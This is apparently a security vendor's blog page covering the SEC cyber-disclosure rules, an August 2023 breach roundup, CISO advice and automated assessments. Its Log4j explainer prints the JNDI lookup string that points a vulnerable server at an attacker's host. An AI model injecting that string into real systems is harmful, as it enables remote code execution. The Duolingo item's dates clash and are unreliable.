At the time, there were several major trends that led the Commission to take this action. The digital evolution and massive work-from-home shifts, intertwined with the allure of cybercrime monetization and an overarching reliance on third-party tech services like cloud platforms, have stretched cyber risk boundaries. The financial fallout from cyber incidents have also skyrocketed. Given all of this, the Commission’s move to ensure transparency isn’t just timely—it’s imperative.

Though the Commission offered guidance in 2011 and 2018, the standards remained inconsistent. The 2022 regulations were introduced to bring consistency and offer investors clearer insights.

Key Mandates To Be Aware Of:

Skip ahead to 2023, and the SEC’s proposed rules have officially transformed into finalized rules. Here are the essential highlights you should be aware of…

  1. Form 8-K Item 1.05: A pivotal element in the new regulations. Public companies now have the duty to report significant cyber incidents. Reports must, “describe the material aspects of the nature, scope, and timing of the incident, as well as the material impact or reasonably likely material impact of the incident on the registrant, including its financial condition and results of operations.” 

  2. Disclosure Timeline: Post a cyber event, companies need to swiftly gauge its significance. If found consequential, a Form 8-K needs to be filed within four business days. However, exceptions do exist. Should the U.S. Attorney General deem a quick disclosure a threat to national or public safety, delays can ensue.

  3. Regulation S-K Item 106: This regulation delves deep. It mandates firms to shed light on their cyber threat assessment, detection, and management strategies. Past incidents that have or might have considerable ramifications also need to be outlined. Plus, it casts the spotlight on how involved the board is in overseeing cyber risks and the prowess of the management in mitigating them.

  4. International Disclosures: The SEC is highlighting that global transparency is crucial. Modifications to Form 6-K and Form 20-F ensure that foreign private entities aren’t left out. Significant cyber events disclosed overseas or required by foreign issuers need to be detailed.

What Lies Ahead:

The new regulations will be operational a month after their Federal Register appearance. For companies, the compliance timelines are split based on the form:

  • Regulation S-K Item 106 & Form 20-F: Disclosure starts with annual statements for fiscal years ending on or after December 15, 2023.

  • Form 8-K Item 1.05 & Form 6-K: Compliance starts 90 days post Federal Register publication or by December 18, 2023, except for smaller firms. They have until June 15, 2024.

  • Finally, when it comes to structured data mandates, the spotlight is on Inline XBRL. The final rules require the cybersecurity disclosures to be presented in Inline eXtensible Business Reporting Language. Entities must tag their disclosures using this format, a year after the kick-off of initial disclosure duties. To simplify what this filing format is for those who may not be aware, it’s a special language for computers that makes it possible to create a single document that’s human and machine readable. So, instead of making two different documents (one for people to read and one for computers to understand), you just make one using Inline XBRL.

Every day we are reminded how crucial cyber resilience is. For CISOs in public companies, aligning with the SEC’s updated cyber regulations is not just about compliance—it’s a commitment to transparency, investor protection, and long-term business sustainability.



August Data Breach And Security Round Up

august security breach round up

August may be known for summer vacations and relaxing by the beach, but in the world of hackers, it was a month of action-packed cyber escapades. As the digital realm grows, so does the audacity of those who breach the walls of data security. In this blog post, I will take you through the breaches that unfolded in the hot days of August. From electric cars to language learning apps, we’ve got it all covered. Let’s dive in.

Tesla:

Tesla recently reported a data breach affecting over 75,000 of its employees to insider misconduct, according to an official statement. The electric vehicle manufacturer, headed by Elon Musk, stated in a data breach report submitted to Maine’s Attorney General that a thorough investigation determined two former employees had disclosed personal information belonging to more than 75,000 individuals to a foreign media organization.

Tesla’s data privacy officer, Steven Elentukh, stated in the report that “the investigation uncovered that two former Tesla employees wrongfully obtained and shared this information, contravening Tesla’s IT security and data protection protocols by providing it to the media outlet.”

The sensitive data included personally identifiable details such as names, addresses, contact numbers, employment records, and Social Security numbers of 75,735 past and current Tesla employees. The report also revealed that the two ex-employees had transmitted this data to the German newspaper Handelsblatt, which assured Tesla it would refrain from publishing the information and adhere to legal restrictions concerning its use.

In May, Handelsblatt had previously reported a significant breach at Tesla, disclosing various internal documents, known as the “Tesla Files,” totaling 100 gigabytes of confidential information. These documents included employee personal data, customer banking information, proprietary production details, and customer grievances regarding Tesla’s Full Self-Driving (FSD) functionalities. Remarkably, the leak even contained Elon Musk’s Social Security number.

Tesla responded by initiating legal action against the individuals believed to be responsible for the data breach, leading to the confiscation of their electronic devices. Additionally, the company obtained court orders to prevent these former employees from further accessing, sharing, or using the data, with potential criminal consequences for violations.

This incident follows a previous report in April by Reuters, which revealed that Tesla employees had shared sensitive images recorded by customer vehicles, including invasive pictures and videos captured by car cameras, over the period from 2019 to 2022.

Duolingo:

In January 2023, a data breach of Duolingo resulted in the exposure of 2.6 million users’ data on a hacking forum. This has created an opportunity for malicious actors to execute targeted phishing campaigns using the compromised information. The dataset consists of public login and real names, along with confidential details, such as email addresses and internal data related to the Duolingo platform, which can be exploited in cyberattacks.

The data was acquired by exploiting a publicly available application programming interface (API), which had been openly shared since at least March 2023. Researchers had been posting on social media and public platforms about the ease of using this API, which ultimately led to the data breach. The API permits anyone to input a username and receive JSON output containing the user’s publicly accessible profile data. Importantly, it also facilitates the input of an email address into the API to confirm its association with a valid Duolingo account.

The presence of email addresses in the dataset raises significant concerns as it can be exploited in phishing campaigns, which can have detrimental effects on individuals and organizations. It is vital to note that while the inclusion of real names and login names is part of a user’s Duolingo profile, the presence of email addresses is not considered public information.

Companies often downplay the significance of scraped data, as much of it is already publicly accessible, even if its compilation is not straightforward. However, when public data is combined with private information, such as phone numbers and email addresses, it amplifies the risk associated with the exposed data and may potentially breach data protection regulations. Facebook encountered a significant breach in 2021 when an “Add Friend” API flaw was exploited to link phone numbers to Facebook accounts for 533 million users. Subsequently, the Irish Data Protection Commission (DPC) imposed a fine on Facebook for this mishandling of scraped data.

I will say, it is also pretty concerning that the API, which led to the Duolingo data breach, is still openly accessible on the internet, even after reports of its misuse were forwarded to Duolingo in January. This puts Duolingo users at risk and highlights the need for companies to take data protection seriously. While companies may downplay the significance of scraped data, the potential for harm is significant, and it is crucial to address these issues proactively to ensure that personal information remains secure.

Discord.io:

On August 14, 2023, an unofficial platform known for providing redirect and invitation links to Discord servers, Discord.io, suffered a significant data breach. The hacker “Akhirah” exposed the breach, which has compromised the personal information of more than 760,000 users.

The stolen data from the breach includes usernames, Discord IDs, email addresses, and passwords that have been salted and hashed. While the password encryption offers a degree of protection, the potential for decryption remains a looming threat, underscoring the immediate need for users to bolster their security. Discord.io urges users to change their passwords to mitigate the impact of the breach.

Discord.io has taken the unprecedented step of indefinitely suspending its operations in response to the breach. Visitors to the Discord.io website now encounter a message detailing the seriousness of the breach. The company is being transparent about the compromised data fields, aiming to provide affected users with clarity regarding the information exposed and what remains secure in the wake of this incident.

“We have canceled existing premium subscriptions, and we will be reaching out to affected users individually. As of now, we have not been contacted by those responsible for the breach, nor have we initiated contact with them. To our knowledge, the database has not been made public at this time.” – Discord.io

In an interview with the hacker Akhirah, he expressed a desire for Discord.io to eliminate malicious content from their platform and communicate with him to resolve these issues, without seeking retribution or a reward.

This data breach follows a similar trend in the cybersecurity landscape. Just recently, the LetMeSpy Android Spyware Service also announced its permanent shutdown following a successful breach by a hacker who gained access to user data.

SEIKO: 

SEIKO NPC Corporation, a long-established Japanese semiconductor manufacturer founded in 1975 with approximately 12,000 employees, has officially recognized the possibility of a data breach.

On August 10th, the company posted a data breach notification on its website. However, cybersecurity experts only recently became aware of the breach after the ransomware group BlackCat featured SEIKO on its data leak platform.

SEIKO did not provide specific details but referred to the cybersecurity incident as a “potential” data breach.

According to SEIKO, “On July 28th of this year, the company experienced a potential data breach. It appears that unauthorized individuals or parties gained access to at least one of our servers.”

ALPHV/BlackCat Ransomware, now taking credit for the breach, shared several files on their data leak platform as evidence. Among these files was what appeared to be a copy of Yoshikatsu Kawada’s passport, a director at SEIKO’s well-known Watch Corporation subsidiary.

After an external cybersecurity expert examined the incident, SEIKO determined that a breach occurred, and some of the company’s information may have been compromised.

“At present, we are in the process of confirming the precise nature of the information stored on the affected servers. Once our ongoing investigation yields more specific results, we will promptly provide an update,” the company stated. However, no further updates regarding the breach have been made available thus far.

About ALPHV/BlackCat Ransomware:

ALPHV/BlackCat ransomware first emerged in 2021. Similar to other entities in the cybercriminal realm, this group operates a ransomware-as-a-service (RaaS) enterprise, selling malware subscriptions to criminal actors. Notably, the gang employs the Rust programming language.

According to an analysis by Microsoft, threat actors associated with this ransomware were known to collaborate with other prominent ransomware families such as Conti, LockBit, and REvil.

The FBI has suggested that money launderers affiliated with the ALPHV/BlackCat cartel have ties to Darkside and Blackmatter ransomware cartels, indicating a well-established network of operatives within the RaaS sector.

Recently, ALPHV/BlackCat has been notably active among ransomware groups. According to cybersecurity analyst ANOZR WAY, the group was responsible for approximately 12% of all attacks in 2022.

This gang appears to have recently focused its efforts on professional service providers. In mid-May, it claimed responsibility for breaching Mazars Group, an international firm specializing in auditing, accounting, and consulting services.

Forever 21:

Clothing and accessories retailer, Forever 21, is in the process of sending data breach notifications to over half a million individuals whose personal information was exposed to unauthorized intruders. The company operates a global network of 540 outlets and has a workforce of approximately 43,000 employees.

A portion of the data breach notification, shared with the Office of the Maine Attorney General, reveals that the company detected a cyberattack on multiple systems on March 20. The investigation unveiled that hackers had sporadic access to Forever 21 systems between January and March of this year and utilized this access to pilfer data.

“The investigation determined that an unauthorized third party accessed specific Forever 21 systems at different intervals between January 5, 2023, and March 21, 2023,” states the notice. “Results from the investigation indicate that the unauthorized third party acquired specific files from certain Forever 21 systems during this timeframe” – Forever 21.

The data breach notice, dispatched on August 29 to 539,207 affected individuals, lists the following potentially exposed data types:

  • Full names

  • Social Security Numbers (SSN)

  • Dates of Birth

  • Bank Account Numbers

  • Forever 21 Health Plan information

BleepingComputer reached out to Forever 21 to ascertain if the security incident impacted both customers and employees. A spokesperson from the company issued the following statement: “The incident was limited to current and former Forever 21 employees and did NOT affect personal data pertaining to Forever 21 customers.”

In the notice, Forever 21 reports that they have taken steps to ensure that the hackers have deleted the stolen data, implying that the company may have engaged in communication with the attacker. Such actions often occur following ransomware attacks, where the victim negotiates with the hackers to reach a reasonable ransom. However, it is important to note that a ransomware attack on Forever 21 has not been confirmed.

In November 2017, Forever 21 informed its customers of another data breach affecting its payment system, resulting in the compromise of card data from transactions made between March and October 2017.

Italian Banks Temporarily Disabled by Distributed Denial of Service (DDoS) Attacks:

Several banks in Italy recently experienced temporary outages due to targeted Distributed Denial of Service (DDoS) attacks.

On August 1st, the Agenzia per la Cybersicurezza Nazionale (ACN) announced that it had identified cyberattacks against at least five banks in the country, resulting in a temporary disruption of their services.

The affected banks included BPER Banca (EMII.MI), Intesa Sanpaolo (ISP.MI), FinecoBank (FBK.MI), Popolare di Sondrio (BPSI.MI), and Monte dei Paschi di Siena (BMPS.MI).

According to the ACN, it “detected the resurgence of distributed denial of service (DDoS) attack campaigns carried out by pro-Russian… groups targeting national institutional entities.” The ACN attributed the attacks to the Russian hacking group known as “NoName.”

An employee from one of the affected banks informed Reuters that the bank’s website was taken offline due to a substantial surge in traffic. However, the bank’s mobile app continued to function normally during the attack, and the website was restored after a brief period.

The ACN stated that it provided assistance to all those affected by the DDoS attacks launched by NoName.

What Are DDoS Attacks?

Distributed Denial of Service (DDoS) attacks involve malicious actors attempting to disrupt a website by overwhelming its infrastructure with a significant volume of internet traffic. As DDoS attacks saturate a site’s bandwidth, users are unable to access it.

DDoS attacks can be motivated by various factors, but their primary objective is to cause disruption by temporarily taking websites offline. Due to their disruptive nature, DDoS attacks are employed by malicious entities as a means of directly targeting specific individuals or organizations.

Moving Forward:

Data breaches can have severe consequences for both companies and individuals, including financial loss, reputational damage, and identity theft. As the frequency and sophistication of cyberattacks continue to increase, it is crucial for companies to prioritize data protection and implement robust security measures. By staying vigilant and proactive in their approach to cybersecurity, organizations can minimize the risk of a data breach and protect their customers’ trust.


The Top 10 Things Every CISO Should Know

what every ciso should know about

What Every CISO Should Know in 2023 to Protect Their Business

 

In our rapidly evolving digital age, the role of a Chief Information Security Officer (CISO) has never been more crucial. As a CISO, your role stretches far beyond traditional IT security measures. You are the protector of your organization’s most valuable assets, from intellectual property to customer data. The following insights delve deeper into what every CISO should know in 2023 to ensure they’re at the forefront of safeguarding their business.

 

1. Grasping the Business

Understanding your business inside out is paramount. The best CISOs fully comprehend the company’s goals, mission, and operational mechanics. Why is this so vital? Because only with this understanding can you adequately prioritize and champion security initiatives. Furthermore, by aligning security measures with business goals, you ensure that security is not viewed as a roadblock but rather an enabler of growth and success.

 

2. Emphasizing Effective Risk Management

Risk management isn’t just a box to tick; it’s a continual process. This involves constant vigilance—identifying emerging threats, assessing their potential impact, and implementing controls to counteract them. Today’s cyber threats are dynamic, with cybercriminals using sophisticated techniques that change by the minute. Hence, regular risk assessments and updates are non-negotiable. But, just as crucial is the art of communication. The ability to articulate these risks, along with their potential implications to the board and executives, can make the difference between proactive action and reactive damage control.

 

3. Moving Beyond Compliance

While regulatory compliance is essential, in 2023, it’s merely a starting point. With the ever-evolving threat landscape, relying solely on regulations and standards can render a business vulnerable. It’s like only installing a front door lock while leaving all the windows open. Instead, a proactive approach, involving continuous assessment and adaptation of security measures to the unique needs and threats faced by your organization, is pivotal.

 

4. Championing Security Awareness

The human factor can often be the weakest link in any security chain. As such, empowering every single employee with the knowledge and tools to act as the first line of defense is vital. This means ongoing training, regular reminders, and cultivating a culture where security is everyone’s business. Remember, from the receptionist to the CEO, everyone can either be an asset or a vulnerability.

 

5. Harnessing the Power of Effective Communication

Clear, concise, and compelling communication can be one of the most potent tools in a CISO’s arsenal. It’s essential to translate the often complex world of security into language that everyone—from the tech newbie to the seasoned board member—can grasp. Regularly updating stakeholders about security postures, potential risks, and ongoing initiatives not only fosters trust but also reinforces the importance of collective vigilance.

 

Expanding the CISO’s Toolkit in 2023:

But let’s push the envelope further. In addition to the critical pointers above, CISOs in 2023 should be aware of:

 

6. Embracing the Cloud and Zero Trust: 

As businesses transition to cloud infrastructures, understanding cloud security best practices becomes paramount. Moreover, adopting a Zero Trust approach—where every access request is fully authenticated, authorized, and encrypted before granting access—ensures layered defense in a distributed work environment.

 

7. Machine Learning and AI:

Cybercriminals are leveraging AI; so should you. Incorporating machine learning can help in anomaly detection, identifying potential threats faster than any human could, and enhancing predictive analytics. Findings not only automates assessments and the auditing process for all of your company’s vendors, but we also offer real time updates on your risk posture powered by RiskRecon and Anomali.

 

8. Regular Penetration Testing:

Gone are the days when an annual penetration test sufficed. Regularly challenging your systems can expose vulnerabilities before cybercriminals exploit them.

 

9. Incident Response Preparedness:

It’s not about if, but when a breach might occur. Having a well-rehearsed incident response plan ensures rapid containment, minimizing potential damage.

 

10. Collaborative Security:

Partnering with other businesses, industry groups, and governmental bodies can provide invaluable intelligence and resources. Cybersecurity is a collective endeavor.

 

In conclusion, being a CISO in 2023 means juggling many balls—compliance, risk management, employee training, effective communication, technological advancements, and more. The threat landscape might be challenging, but with the right approach, tools, and mindset, CISOs can ensure their organizations are robustly defended and primed for growth.

 

 

Benefits of Automating Security Assessments for Your Organization

Findings.co explores the benefits of automating security assessments

It is indeed true that companies that fail to leverage automated tools are overlooking significant opportunities. This hold particularly true when it comes to security and compliance. Companies are finding it increasingly challenging to proactively identify, address, and mitigate security issues, since, well – there’s more threats than ever. Conducting regular security assessments is essential to detect vulnerabilities and reduce the risk of future breaches. However, relying on manual methods and outdated procedures can be unreliable and diminish the effectiveness of risk mitigation strategies. To ensure secure and robust networks, as a business leader, you must prioritize the implementation of automated security assessments. They not only minimize risk exposure, but they can shorten the sales cycle and save a company money, and they also strengthen cybersecurity defenses, making it a crucial investment for your company. 

(Source: CISA – Continuous Diagnostics and Mitigation Learning Program: Benefits of Automating Security Control Assessments)

Automation Speeds Up Reaction and Activity:

Automation plays a vital role in streamlining processes and driving transformation in modern industries. By automating the risk assessment process and management, organizations can make informed financial decisions, streamline risk and compliance procedures, and enhance their overall risk profile. This automation eliminates human error, enables faster response times, and promotes growth. Real-time threat information and risk reports empower security teams to handle threats more effectively and improve response and action times. Automated risk management strategies can efficiently compile, classify, upload, and organize incoming data, which allows for the identification of similar incidents and the implementation of prepared actions or responses.

Enhanced Cybersecurity Risk Management:

Automated assessments provide organizations the ability to manage cybersecurity risks more comprehensively and effectively. These assessments offer security teams up-to-date and detailed data about ALL their vendors that can be shared with senior management and executives. By eliminating manual tasks and enabling real-time monitoring, automation allows risk managers to focus on risk avoidance and mitigation. Furthermore, automation expedites the entire risk management process by instantly uploading fresh data and promptly reporting any issues. Through continuous monitoring and real-time visibility, organizations can identify gaps in their cybersecurity posture and take the necessary security measures to rectify them.

Standardizing Data and Improving Collaboration:

In many organizations, different departments rely on separate and potentially incompatible data to analyze and assess cyber risks. With so much data floating around in different hands, conflicting reports create confusion among managers. Automated security assessments provide a centralized platform for data collection, ensuring consistent and standardized data across the organization. This eliminates discrepancies and enables effective collaboration among departments. Executives and managers can access accurate and comprehensive information, leading to better-informed decision-making and improved cyber risk management strategies.

Scaling Security Risk Assessment:

Automation significantly simplifies the scalability of security risk assessment processes within a company. Automated assessment platforms like Findings are designed to handle both small and large-scale tasks, allowing organizations to adapt to changing demands without the need for hiring and training new personnel. Predictability is another advantage of automation, as most response actions can be anticipated, making it easier to manage various system interactions securely. Additionally, automation provides better tracking capabilities, allowing organizations to monitor progress, identify completed assessment components, and address pending tasks more efficiently.

Measuring ROI of Automation:

Calculating the return on investment (ROI) for automated security risk assessment involves considering the time and resources saved by automating time-consuming tasks and preventing adverse outcomes. While evaluating the ROI for automated security risk assessment may differ from other business operations, the goal is to demonstrate to IT management that the investment was worthwhile, considering the resources and time allocated.

Out With the Old, in With the New:

In today’s digital landscape, where cyberattacks are a constant threat, automating security assessments is not just beneficial but imperative for organizations aiming to protect their assets, maintain customer trust, and ensure business continuity. It is an investment that pays off in terms of enhanced security, streamlined processes, and improved risk management.

Collaborating with companies like Findings – who specialize in security risk assessment automation can help organizations identify weaknesses and risks more effectively. Automated security risk assessments provide a proactive approach to maintaining the security of organizational systems, preventing potential breaches, and ensuring a safe operating environment. By leveraging automation, organizations can improve response times, standardize data, enhance collaboration, and scale security risk assessment processes. It is crucial for businesses to embrace automation.

What is Log4j vulnerability? Do you need to worry?

Findings VDP | log4j mitigation

Log4j vulnerability,  CVE-2021-44228, became public on December 9, 2021.

This easily triggered log4j vulnerability can be used to gain RCE (remote code execution) in vulnerable systems when the Apache Log4j utility is used. Other Apache products are vulnerable as well, such as Apache Solr.

 

Log4j is easily triggered just by log a special string {jndi:ldap://<attacker’s server>/a}; it impacts Apache Log4j version 2.0-beta9 to 2.15.0-rc, and is common in enterprise software and cloud servers across industry. Unless fixed, it enables easy access to internal networks that can end up with valuable data theft, malware implementation, crucial information deletion, and more.

 

This vulnerability is so critical, that it received the rare 10 out of 10 CVSS scores.

 

Fortunately, not everyone is affected, and mitigation can be easily applied, but first, it is recommended to check if you have been exposed to log4j easily, using Findings’ log4j free VDaaS tool.

 

For more information, feel free to visit our log4j information page

Supply Chain Risk Monitoring as a Service
Join us today
Supply Chain Risk Monitoring as a Service
Join us today

Let's Tackle Compliance Together

Waitlist signup

Welcome to Findings

Let's go over some details to setup your tailor-made account


Please fill your details below and click "Next" to create your account:

Payment

Feature
Startup
Business
Enterprise
Price
$10 / Month
$10 / Month
$25 / Month
VDPaaS
Alerts
Assessments
Integrated Apps
API
Join today and scan ALL YOUR VENDORS for FREE*
* FREE VENDOR SCAN for all of your vendors during your first month.
Feature
Startup
Business
Enterprise
Price
$25 / Month
$200 / Month*
Contact Us
Free vendors scan for 1 month
Findings search engine
Rapid security and compliance profile
Profile/showcase engagements per year
5
40
Unlimited
Multi/unlimited showcase use cases
Showcase compliance badge for your website
Best practice self-assessment
1 Findings or 1 BYOC
Assessment response automation
Personalizable, branded security & compliance showcase page
File/evidence repository
OKTA
DKIM
Out-of-the-box TPRM
20 vendors +
20 rating scans
50 vendors +
50 rating scans
Support
Email
Priority via Phone / Email
Internal Workflows (SO/BO)
Onboarding and customization account setup
*Price for every 40 engagements
Automate assessment response and showcase your cybersecurity posture
Supply Chain Risk Monitoring as a Service
Join us today
.
.
.
.

Thank you for signing up!

Supply Chain Risk Monitoring as a Service
Join us today
.
.
.
.

Thank you for signing up!